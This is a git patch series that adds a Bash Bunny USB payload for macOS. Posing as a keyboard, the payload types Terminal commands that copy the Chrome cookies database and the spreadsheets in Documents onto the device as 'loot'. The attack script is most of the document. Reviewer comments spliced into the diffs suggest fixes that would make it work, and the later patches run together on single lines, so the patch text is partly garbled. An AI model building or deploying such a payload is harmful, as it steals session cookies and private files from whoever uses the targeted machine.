From adb87d9919daad551ebaac5ca90389708e238f9d Mon Sep 17 00:00:00 2001
From: bobmcdouble3
Date: Wed, 8 Mar 2017 18:27:47 -0500
Subject: [PATCH 1/5] Add files via upload
---
 payloads/library/macinfograbber/payload.txt | 33 +++++++++++++++++++++
 payloads/library/macinfograbber/readme.md | 20 +++++++++++++
 2 files changed, 53 insertions(+)
 create mode 100644 payloads/library/macinfograbber/payload.txt
 create mode 100644 payloads/library/macinfograbber/readme.md
diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
new file mode 100644
index 00000000..e63b44fa
--- /dev/null
+++ b/payloads/library/macinfograbber/payload.txt
@@ -0,0 +1,33 @@
+LED R
+ATTACKMODE HID STORAGE
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 8000
+QUACK STRING mkdir -p /Volumes/BashBunny/MacLoot/xlsx
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/MacLoot/chromecookies.db
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/MacLoot/xlsx/
+QUACK ENTER
+QUACK DELAY 1000
+QUACK GUI q
+QUACK DELAY 500
+QUACK ENTER
+
+# Green LED for finished
+LED G
+
+files=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
+if [ "$files" != "0" -o "$files2" != "0"]
+then
+# Got spreadsheet files
+LED R B
+else
+LED R
+# No spread sheets
+fi
diff --git a/payloads/library/macinfograbber/readme.md b/payloads/library/macinfograbber/readme.md
new file mode 100644
index 00000000..2222832c
--- /dev/null
+++ b/payloads/library/macinfograbber/readme.md
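Review bot: The result check at the end of payload.txt can never take the success branch, because `"0"]` has no space before the closing bracket; `[` fails with a missing-`]` error and control always falls through to `else` (solid red) whatever was counted. Writing it as `if [ "$files" != "0" ] || [ "$files2" != "0" ]; then` fixes that and also drops the deprecated `-o`. `LED G` is set just before this test and then overwritten by one of the two branches, so the readme's "Green = Attack Finished" state is never the one left showing. The same lines are added again in PATCH 2/5 and stay as unchanged context in PATCH 4/5 and 5/5.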
@@ -0,0 +1,20 @@
+# Mac Info Grabber for the BashBunny
+
+* Author: kmakblob
+* Version: Version 1.0
+* Target: OSX
+
+## Description
+
+A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
+the Documents folder and places them inside a folder on the BashBunny called MacLoot.
+
+This payload can be easily modified to grab other files like word docs or csv files.
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Green | Attack Finished |
+| Purple | Successfully grabbed xls or xlsx files |
+| RED | Did not get any xls or xlsx files |
From 4af04427aa0bce6b62d44e4f1b423dc827e5210f Mon Sep 17 00:00:00 2001
From: bobmcdouble3
Date: Wed, 8 Mar 2017 19:33:30 -0500
Subject: [PATCH 2/5] Add files via upload MacInfoGrabber 1.1: Updates: Made the loot folder more detailed and changed it to payloads/SWITCH_POSITION/MacLoot
---
 macinfograbber/payload.txt | 33 +++++++++++++++++++++++++++++++++
 macinfograbber/readme.md | 20 ++++++++++++++++++++
 2 files changed, 53 insertions(+)
 create mode 100644 macinfograbber/payload.txt
 create mode 100644 macinfograbber/readme.md
diff --git a/macinfograbber/payload.txt b/macinfograbber/payload.txt
new file mode 100644
index 00000000..a34ed342
--- /dev/null
+++ b/macinfograbber/payload.txt
@@ -0,0 +1,33 @@
+LED R
+ATTACKMODE HID STORAGE
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 8000
+QUACK STRING mkdir -p /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/chromecookies.db
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/
+QUACK ENTER
+QUACK DELAY 1000
+QUACK GUI q
+QUACK DELAY 500
+QUACK ENTER
+
+# Green LED for finished
+LED G
+
+files=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
+if [ "$files" != "0" -o "$files2" != "0"]
+then
+# Got spreadsheet files
+LED R B
+else
+LED R
+# No spread sheets
+fi
diff --git a/macinfograbber/readme.md b/macinfograbber/readme.md
new file mode 100644
index 00000000..2222832c
--- /dev/null
+++ b/macinfograbber/readme.md
@@ -0,0 +1,20 @@
+# Mac Info Grabber for the BashBunny
+
+* Author: kmakblob
+* Version: Version 1.0
+* Target: OSX
+
+## Description
+
+A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
+the Documents folder and places them inside a folder on the BashBunny called MacLoot.
+
+This payload can be easily modified to grab other files like word docs or csv files.
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Green | Attack Finished |
+| Purple | Successfully grabbed xls or xlsx files |
+| RED | Did not get any xls or xlsx files |
From 0f2a390fb1c6cee63544e749413c958603159969 Mon Sep 17 00:00:00 2001
From: kmakblob
Date: Wed, 8 Mar 2017 19:38:52 -0500
Subject: [PATCH 3/5] d
---
 macinfograbber/payload.txt | 33 ---------------------------------
 macinfograbber/readme.md | 20 --------------------
 2 files changed, 53 deletions(-)
 delete mode 100644 macinfograbber/payload.txt
 delete mode 100644 macinfograbber/readme.md
diff --git a/macinfograbber/payload.txt b/macinfograbber/payload.txt
deleted file mode 100644
index a34ed342..00000000
--- a/macinfograbber/payload.txt
+++ /dev/null
@@ -1,33 +0,0 @@
-LED R
-ATTACKMODE HID STORAGE
-QUACK GUI SPACE
-QUACK DELAY 1000
-QUACK STRING terminal
-QUACK ENTER
-QUACK DELAY 8000
-QUACK STRING mkdir -p /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx
-QUACK ENTER
-QUACK DELAY 500
-QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/chromecookies.db
-QUACK ENTER
-QUACK DELAY 1000
-QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/
-QUACK ENTER
-QUACK DELAY 1000
-QUACK GUI q
-QUACK DELAY 500
-QUACK ENTER
-
-# Green LED for finished
-LED G
-
-files=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
-files2=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
-if [ "$files" != "0" -o "$files2" != "0"]
-then
-# Got spreadsheet files
-LED R B
-else
-LED R
-# No spread sheets
-fi
diff --git a/macinfograbber/readme.md b/macinfograbber/readme.md
deleted file mode 100644
index 2222832c..00000000
--- a/macinfograbber/readme.md
+++ /dev/null
@@ -1,20 +0,0 @@
-# Mac Info Grabber for the BashBunny
-
-* Author: kmakblob
-* Version: Version 1.0
-* Target: OSX
-
-## Description
-
-A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
-the Documents folder and places them inside a folder on the BashBunny called MacLoot.
-
-This payload can be easily modified to grab other files like word docs or csv files.
-
-## STATUS
-
-| LED | Status |
-| ------------------ | -------------------------------------------- |
-| Green | Attack Finished |
-| Purple | Successfully grabbed xls or xlsx files |
-| RED | Did not get any xls or xlsx files |
From dfeb22540990ff8f04ac4b526d8b3a64e2bb3c2e Mon Sep 17 00:00:00 2001
From: bobmcdouble3
Date: Wed, 8 Mar 2017 19:40:47 -0500
Subject: [PATCH 4/5] Add files via upload
---
 payloads/library/macinfograbber/payload.txt | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
index e63b44fa..a34ed342 100644
--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -5,13 +5,13 @@ QUACK DELAY 1000
 QUACK STRING terminal
 QUACK ENTER
 QUACK DELAY 8000
-QUACK STRING mkdir -p /Volumes/BashBunny/MacLoot/xlsx
+QUACK STRING mkdir -p /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/MacLoot/chromecookies.db
+QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/chromecookies.db
 QUACK ENTER
 QUACK DELAY 1000
-QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/MacLoot/xlsx/
+QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/
 QUACK ENTER
 QUACK DELAY 1000
 QUACK GUI q
@@ -21,8 +21,8 @@ QUACK ENTER # Green LED for finished LED G -files=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xls 2> /dev/null | wc -l) -files2=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l) +files=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xls 2> /dev/null | wc -l) +files2=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l) if [ "$files" != "0" -o "$files2" != "0"] then # Got spreadsheet files From f0fff03845dbff440a1b086be57b945606219205 Mon Sep 17 00:00:00 2001 From: bobmcdouble3 Date: Thu, 9 Mar 2017 07:01:33 -0500 Subject: [PATCH 5/5] Add files via upload --- payloads/library/macinfograbber/payload.txt | 26 +++++++++++++++++---- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt index a34ed342..cf4461b0 100644 --- a/payloads/library/macinfograbber/payload.txt +++ b/payloads/library/macinfograbber/payload.txt 
@@ -1,17 +1,33 @@ +#!/bin/bash +# +# Title: Mac Info Grabber +# Author: kmakblob +# Version: 1.1 +# +# Steaks cookies from chrome and documents from the documents folder (spreadsheets) +# then stashes them in /root/udisk/loot/MacLoot +# +# Red................Failed to get spreadsheets +# Purple.............Got some spreadsheets +# Green..............Finished +# + LED R ATTACKMODE HID STORAGE +LOOTDIR=/root/udisk/loot/MacLoot +mkdir -p $LOOTDIR QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 8000 -QUACK STRING mkdir -p /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx +QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/xlsx QUACK ENTER QUACK DELAY 500 -QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/chromecookies.db +QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db QUACK ENTER QUACK DELAY 1000 -QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/ +QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/$LOOTDIR/xlsx/ QUACK ENTER QUACK DELAY 1000 QUACK GUI q @@ -21,8 +37,8 @@ QUACK ENTER # Green LED for finished LED G -files=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xls 2> /dev/null | wc -l) -files2=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l) +files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l) +files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l) if [ "$files" != "0" -o "$files2" != "0"] then # Got spreadsheet files
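Review bot: The new header comment lists the LED states but says nothing about what a run leaves on the target, which is what anyone triaging the test afterwards (or an unexpected USB event) needs. I would add a line such as `# Host footprint: opens Terminal via Spotlight, types mkdir/cat/cp against /Volumes/BashBunny, then quits Terminal`; the typed commands presumably also end up in the user's shell history, but that is not visible from the hunk. In the same header, `Steaks` should read `Steals`, and `Version: 1.1` disagrees with the `Version 1.0` in the readme added in PATCH 1/5, which this series never updates. `mkdir -p $LOOTDIR` should quote the expansion: `mkdir -p "$LOOTDIR"`.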